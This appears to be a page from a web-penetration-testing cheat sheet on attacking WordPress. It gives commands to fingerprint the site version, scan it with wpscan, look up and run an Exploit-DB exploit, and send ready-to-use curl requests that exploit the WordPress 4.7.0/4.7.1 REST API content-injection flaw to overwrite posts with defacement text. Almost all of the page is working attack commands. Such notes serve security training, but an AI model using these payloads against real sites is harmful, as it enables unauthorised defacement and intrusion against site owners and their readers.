WordPress

Curl to get WordPress version

curl -s http://www.test.com/wordpress/ | grep generator

Use wpscan to run vulnerability scan against wordpress site

wpscan --no-update --url http://www.test.com/wordpress/ | grep Title

Use searchsploit against version of wordpress site

searchsploit wordpress 4.7.1

# Review exploit
searchsploit 41224 --examine
# or
cat /opt/exploitdb/exploits/linux/webapps/41224.rb

# To run exploit (Could be python or ruby)
ruby /opt/exploitdb/exploits/linux/webapps/41224.rb

curl --data "id=4xxxxx&title=PWNED&content=Epic PWNAGE" http://www.sec542.org/wordpress/index.php/wp-json/wp/v2/posts/4

Curl exploit for WordPress 4.7.0/4.7.1 Content Injection

Modify id=5 and end of url per what id you get when you run curl http://www.test.com/wordpress/wp-json/wp/v2/posts. The below will modify a post. Can also be done via Atom: https://blog.websecurify.com/2017/02/hacking-wordpress-4-7-0-1.html

curl --data "id=5xxxxx&title=HACKED&content=THIS SITE IS EXPLOITABLE" http://www.test.com/wordpress/index.php/wp-json/wp/v2/posts/5

PreviousWeb VulnerabilitiesNextCSP Bypass

Last updated